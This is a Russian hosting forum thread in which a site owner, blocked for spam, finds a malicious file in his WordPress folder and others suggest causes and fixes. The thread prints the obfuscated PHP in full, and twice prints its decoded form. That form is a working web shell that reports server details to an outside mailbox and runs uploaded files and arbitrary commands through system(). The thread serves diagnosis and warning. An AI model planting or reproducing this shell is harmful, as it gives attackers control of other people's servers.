best-hoster: блокировка за рассылку учетной записью спама

45

fsou1

26 октября 2012, 10:15

2617

Вобщем, сегодня заблокировали учетную запись за попытку разослать 30.000 писем спама. Сам я конечно подобной фигней не занимаюсь, однако повторения инцедента очень и очень не хочется.

В результате общения с саппортом, сервер разблокировали, сказав, что в случае повторения инцедента разблокировать сервер уже будет нельзя.

На вопрос, "Что я могу сделать с почтой, чтобы не получать входящие и не иметь возможность отправить исходящие сообщения с сервера?"

Получил многозначительный ответ:

"Уважаемый(ая) Максим!

Ничего.

Спасибо."

Т.е. заблокировать моему аккаунту доступ к SMTP серверу нельзя? И закрыть 25 порт для исх. записей тоже?

У кого-то была подобная проблема и как её можно решить? На сервере находится большое кол-во сайтов, поэтому терять его не хотелось бы.

X7

79

xexe77

26 октября 2012, 10:23

#1

Переезжайте к другому хостеру ;)

Зачем вам те кто не может сделать элементарный вещей...?

1

115

AGHost

26 октября 2012, 10:38

#2

Если у Вас сервер/ВПС, то заблокировать можно почту в обе стороны без проблем. Если шаред хостинг, то тут сложнее. Скорей всего вирусня какая-то на сайте, необходимо удалять скрипты и смотреть какую уязвимость они используют для заражения, иначе этот спам не прекратится.

8 лет на рынке услуг хостинга - https://agho.st (https://agho.st)

Кто показывает неправильно: Яндекс Посоветуйте хостинг для проекта DDos на сайт, хостинг

45

fsou1

26 октября 2012, 10:48

#3

https://best-hoster.ru/info/tarifs.html

Тариф profy, шаред хостинг?

X7

79

xexe77

26 октября 2012, 10:50

#4

fsou1:
https://best-hoster.ru/info/tarifs.html

Тариф profy, шаред хостинг?

Просто шаред хостинг :) Цены и услуги как у всех :)

45

fsou1

26 октября 2012, 10:55

#5

Как же всё печально =\

IL

435

ivan-lev

26 октября 2012, 11:21

#6

fsou1:
заблокировали учетную запись за попытку разослать 30.000 писем спама

А подробностей нет? Через SMTP? или скриптом? Если скрипт - какой?

Вообще, провериться не мешало бы.. можно этим

1

... :) Облачные серверы от RegRu - промокод 3F85-3D10-806D-7224 ( http://levik.info/regru )

45

fsou1

26 октября 2012, 11:23

#7

Подробностей никаких.

Отправили пример письма, то что их кол-во 30.000 и 100 Мб логов.

Спасибо за ссылку, сейчас попробую воспользоваться.

---------- Добавлено 26.10.2012 в 15:50 ----------

Не успешно =\ Ничего толком не нашлось

---------- Добавлено 26.10.2012 в 16:12 ----------

Благодаря сканированию на вирусы, встроенному в cpanel, удалось найти 3 файла в каталогах вордпресс:

/site.ru/o.php

/site.ru/wp-includes/wp-simple.php

которые, вероятно, и стали причиной рассылки. Вот только вопрос, как теперь определить, откуда они взялись? =\

---------- Добавлено 26.10.2012 в 16:49 ----------

Поступило продолжение.

В файле /site.ru/wp-includes/wp-simple.php находится следующее содержимое:


GIF89a???????????!??????,???????D?;?<?php



session_start();



error_reporting(0);



$string = 'rUh6QuNTEP5cpPsPyzYnJzpjoEWlE8ToKJgStRAaJ/0CyNrYm3EPe3rtrsmliP/emV07L8cdpdIhUjgzzzMvz4wnXKlPxYqXhTJPztoHneNqO29X2rtPeGHarTgKo6g/uL71Juwze/DuO52fnt7ttB6FFiYpKnZVQA6A1E3wCTwibvhqOLyll6PRWnw5iFP0Ht1Pft5lD8O/xm40isfDvgNZimcJCMpFU5ZZzggwa2/IncTQyKcI03nK84OUA/STkCKeTpUeGuO8Vbm3qn8F7JCnluZWpYRMT/jo9CKMrwbnIQQYXFzQ4+dqOzzT/BXUNYB5d65XrgLIOC+0mSwly2x71ZHn/sen5+dQkKnumT+YT06Q75GG4dVgFGGQZSayNmi9w0OYAuanGU39pMjpHqFJKbpUL5kWGfkNx8IkmRtGHmi7jUmgTdPOnezfkIirVI6F1F3cVgLWfp0GzFqt1En+b+z1lNdvvUB8+GBIEtNpszq/h6NbL8kKyWR6Y3hnRKmEYu6BF50N+zej+KL/dGt9bRVtaRdFro0gwRpoPjgbX4XXo2s4GIy8e59pF+W+kFZJARSftcjLjPvlvMQtRNzJ7PLtERew4xr4gStn9KYVOmUrBKBxXhDaM8Jx/HEs/5DFT5J9EtnaVjTnTNbrOmJiouwHu6l20wJeNi3+4cEvJCkymNrPH+0fAEKov8rt015qsiK3wBhKMPSAtqkPrcZgAH2MNbY7Pu28NccYCNBZJdLAU8qX8AgRSSl8V3N45+x453NMYsqHUISEFMcaSmmkne0w01cmUxSSlAtVU2PHklLq3rcEWmEjW0igjUVyodvo3/O6nl1V69pSX8alaGj2D9GhuKmUJHXxAdxZ+HbDYbe9tn8rxd3d/8kB6O8nqROhcR5VpmWS4zkBpWLwvhJzNQgoPWxd0LMiz5lZGwF7T5aVIXNM8oAa/sVDghoHNMlGuu2NqlYu1n4Xh5JUlkj2+wPgu0vZiWq8XSmHAdkQbJUZRDJyLGE/coY1lTftYDf/0cK4zAqWkguRZNtTF9EvupmLNOWyrkm72rcARuDXYdxa/FfrnB9dtEqruOYLyz4im1J5xFQ1Hfvw1zqP5At8oCTJmNaBblsESnHtoxOz0tY1vCXvxolSxWE9VGGOeXIZqcB4X67fgd2WraPh1OUA6ck67ETGKxzdbY0k3j3gLMjubl488thS53aMgPY3KSYvcFSDy7uqxrd26m9+VSjs1t2RcyvgSpKnaxeeiTvIccsfSFbCtSYGWf7X4eBrHZ0TbVme7dv2T+Rt6RuV4R2xktXOPLW/XMB3QUXMvwh6NPyyLLXhubdEYa9HfPMK4rYwxZnbFIwMG6eDw4OD91EVC3xtYvEuRxuTatb0YcPfjNl6ZWA7/wI=';



eval(gzinflate(str_rot13(base64_decode($string))));



?>

которое при расшифровке превращается в:

error_reporting(0);

if (!isset($_SESSION['bajak']))	{

$visitcount = 0;

$web = $_SERVER["HTTP_HOST"];

$inj = $_SERVER["REQUEST_URI"];

$body = "ada yang inject \n$web$inj";

$safem0de = @ini_get('safe_mode');

if (!$safem0de) {$security= "SAFE_MODE = OFF";}

else {$security= "SAFE_MODE = ON";};

$serper=gethostbyname($_SERVER['SERVER_ADDR']);

$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);

mail("injectortarget@gmail.com", "$body","Hasil Bajakan http://$web$inj\n$security\nIP Server = $serper\n IP Injector= $injektor");

$_SESSION['bajak'] = 0;

}

else {$_SESSION['bajak']++;};

if(isset($_GET['clone'])){

$source = $_SERVER['SCRIPT_FILENAME'];

$desti =$_SERVER['DOCUMENT_ROOT']."/wp-includes/wp-simple.php";

rename($source, $desti);

}

$safem0de = @ini_get('safe_mode');

if (!$safem0de) {$security= "SAFE_MODE : OFF";}

else {$security= "SAFE_MODE : ON";}

echo "<title>UnKnown - Simple Shell</title><br><br>";

echo "<font size=2 color=#888888><b>".$security."</b><br>";

$cur_user="(".get_current_user().")";

echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";

echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";

function pwd() {

$cwd = getcwd();

if($u=strrpos($cwd,'/')){

if($u!=strlen($cwd)-1){

return $cwd.'/';}

else{return $cwd;};

}

elseif($u=strrpos($cwd,'\\')){

if($u!=strlen($cwd)-1){

return $cwd.'\\';}

else{return $cwd;};

};

}

echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';

echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';

if(isset($_POST['submit'])){

$uploaddir = pwd();

if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};

move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);

if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){

echo "Upload Failed";

} else { echo "Upload Success to ".$uploaddir.$name." :D "; }

}

if(isset($_POST['command'])){

$cmd = $_POST['cmd'];

if(function_exists('system')){

echo "<pre>";

echo "<textarea name=cmd cols=100% rows=10%>";

system($cmd);

echo "</textarea>";

echo "</pre>";

}

}

Таким образом, на первый взгляд, индонезийский друг получает доступ к серверу и имеет возможность загружать свои файлы.

Так что, советую Вам провериться на наличие таких файлов в директории вордпресса.

Вопрос в том, откуда взялись эти wp-simple.php файлы =\\

Почему гугл глупее яндекса? Возможно ли самостоятельно победить Хостинг файлов UCloud -

98

root.serverside.ru

26 октября 2012, 12:58

#8

fsou1:
Подробностей никаких.

Отправили пример письма, то что их кол-во 30.000 и 100 Мб логов.

Спасибо за ссылку, сейчас попробую воспользоваться.

---------- Добавлено 26.10.2012 в 15:50 ----------

Не успешно =\ Ничего толком не нашлось

---------- Добавлено 26.10.2012 в 16:12 ----------

Благодаря сканированию на вирусы, встроенному в cpanel, удалось найти 3 файла в каталогах вордпресс:

/site.ru/o.php
/site.ru/wp-includes/wp-simple.php

которые, вероятно, и стали причиной рассылки. Вот только вопрос, как теперь определить, откуда они взялись? =\

---------- Добавлено 26.10.2012 в 16:49 ----------

Поступило продолжение.

В файле /site.ru/wp-includes/wp-simple.php находится следующее содержимое:


GIF89a???????????!??????,???????D?;?<?php



session_start();



error_reporting(0);



$string = 'rUh6QuNTEP5cpPsPyzYnJzpjoEWlE8ToKJgStRAaJ/0CyNrYm3EPe3rtrsmliP/emV07L8cdpdIhUjgzzzMvz4wnXKlPxYqXhTJPztoHneNqO29X2rtPeGHarTgKo6g/uL71Juwze/DuO52fnt7ttB6FFiYpKnZVQA6A1E3wCTwibvhqOLyll6PRWnw5iFP0Ht1Pft5lD8O/xm40isfDvgNZimcJCMpFU5ZZzggwa2/IncTQyKcI03nK84OUA/STkCKeTpUeGuO8Vbm3qn8F7JCnluZWpYRMT/jo9CKMrwbnIQQYXFzQ4+dqOzzT/BXUNYB5d65XrgLIOC+0mSwly2x71ZHn/sen5+dQkKnumT+YT06Q75GG4dVgFGGQZSayNmi9w0OYAuanGU39pMjpHqFJKbpUL5kWGfkNx8IkmRtGHmi7jUmgTdPOnezfkIirVI6F1F3cVgLWfp0GzFqt1En+b+z1lNdvvUB8+GBIEtNpszq/h6NbL8kKyWR6Y3hnRKmEYu6BF50N+zej+KL/dGt9bRVtaRdFro0gwRpoPjgbX4XXo2s4GIy8e59pF+W+kFZJARSftcjLjPvlvMQtRNzJ7PLtERew4xr4gStn9KYVOmUrBKBxXhDaM8Jx/HEs/5DFT5J9EtnaVjTnTNbrOmJiouwHu6l20wJeNi3+4cEvJCkymNrPH+0fAEKov8rt015qsiK3wBhKMPSAtqkPrcZgAH2MNbY7Pu28NccYCNBZJdLAU8qX8AgRSSl8V3N45+x453NMYsqHUISEFMcaSmmkne0w01cmUxSSlAtVU2PHklLq3rcEWmEjW0igjUVyodvo3/O6nl1V69pSX8alaGj2D9GhuKmUJHXxAdxZ+HbDYbe9tn8rxd3d/8kB6O8nqROhcR5VpmWS4zkBpWLwvhJzNQgoPWxd0LMiz5lZGwF7T5aVIXNM8oAa/sVDghoHNMlGuu2NqlYu1n4Xh5JUlkj2+wPgu0vZiWq8XSmHAdkQbJUZRDJyLGE/coY1lTftYDf/0cK4zAqWkguRZNtTF9EvupmLNOWyrkm72rcARuDXYdxa/FfrnB9dtEqruOYLyz4im1J5xFQ1Hfvw1zqP5At8oCTJmNaBblsESnHtoxOz0tY1vCXvxolSxWE9VGGOeXIZqcB4X67fgd2WraPh1OUA6ck67ETGKxzdbY0k3j3gLMjubl488thS53aMgPY3KSYvcFSDy7uqxrd26m9+VSjs1t2RcyvgSpKnaxeeiTvIccsfSFbCtSYGWf7X4eBrHZ0TbVme7dv2T+Rt6RuV4R2xktXOPLW/XMB3QUXMvwh6NPyyLLXhubdEYa9HfPMK4rYwxZnbFIwMG6eDw4OD91EVC3xtYvEuRxuTatb0YcPfjNl6ZWA7/wI=';



eval(gzinflate(str_rot13(base64_decode($string))));



?>

которое при расшифровке превращается в:

error_reporting(0);

if (!isset($_SESSION['bajak']))	{

$visitcount = 0;

$web = $_SERVER["HTTP_HOST"];

$inj = $_SERVER["REQUEST_URI"];

$body = "ada yang inject \n$web$inj";

$safem0de = @ini_get('safe_mode');

if (!$safem0de) {$security= "SAFE_MODE = OFF";}

else {$security= "SAFE_MODE = ON";};

$serper=gethostbyname($_SERVER['SERVER_ADDR']);

$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);

mail("injectortarget@gmail.com", "$body","Hasil Bajakan http://$web$inj\n$security\nIP Server = $serper\n IP Injector= $injektor");

$_SESSION['bajak'] = 0;

}

else {$_SESSION['bajak']++;};

if(isset($_GET['clone'])){

$source = $_SERVER['SCRIPT_FILENAME'];

$desti =$_SERVER['DOCUMENT_ROOT']."/wp-includes/wp-simple.php";

rename($source, $desti);

}

$safem0de = @ini_get('safe_mode');

if (!$safem0de) {$security= "SAFE_MODE : OFF";}

else {$security= "SAFE_MODE : ON";}

echo "<title>UnKnown - Simple Shell</title><br><br>";

echo "<font size=2 color=#888888><b>".$security."</b><br>";

$cur_user="(".get_current_user().")";

echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";

echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";

function pwd() {

$cwd = getcwd();

if($u=strrpos($cwd,'/')){

if($u!=strlen($cwd)-1){

return $cwd.'/';}

else{return $cwd;};

}

elseif($u=strrpos($cwd,'\\')){

if($u!=strlen($cwd)-1){

return $cwd.'\\';}

else{return $cwd;};

};

}

echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';

echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';

if(isset($_POST['submit'])){

$uploaddir = pwd();

if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};

move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);

if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){

echo "Upload Failed";

} else { echo "Upload Success to ".$uploaddir.$name." :D "; }

}

if(isset($_POST['command'])){

$cmd = $_POST['cmd'];

if(function_exists('system')){

echo "<pre>";

echo "<textarea name=cmd cols=100% rows=10%>";

system($cmd);

echo "</textarea>";

echo "</pre>";

}

}

Таким образом, на первый взгляд, индонезийский друг получает доступ к серверу и имеет возможность загружать свои файлы.

Так что, советую Вам провериться на наличие таких файлов в директории вордпресса.

Вопрос в том, откуда взялись эти wp-simple.php файлы =\\

это зависит от того:

1. где Вы скачали сам wordpress (из оф источника?)

2. храните ли Вы локально пароли от ftp (прописанные в ftp клиенте)

3. используете лиц ПО, либо варез, гейгены и т.п.

Помимо того, что с 90% вероятностью бот слил пароли от фтп от Вас, также существует вероятность что ломанули хостера, либо нашли уязвимость в WP, либо его отдельно взятом модуле.

В общем - режим паранои временно /on. Не помешает

Как определить, откуда у подскажите по проблеме на Безопасность в сети -

45

fsou1

26 октября 2012, 13:14

#9

Вордпресс офф, пароли не храню =\

P

251

porutchik

26 октября 2012, 13:32

#10

Попросите техподдержку отключить вам функцию mail() в php (disable_functions=mail,...). Это решит 99% проблем со спамом от взломанных cms.

1

Интернет Хостинг Центр IHC.RU - Хостинг, KVM VPS на SSD, аренда серверов.

В 2023 году Google заблокировал более 170 млн фальшивых отзывов на Картах

Как снизить ДРР до 4,38% и повысить продажи с помощью VK Рекламы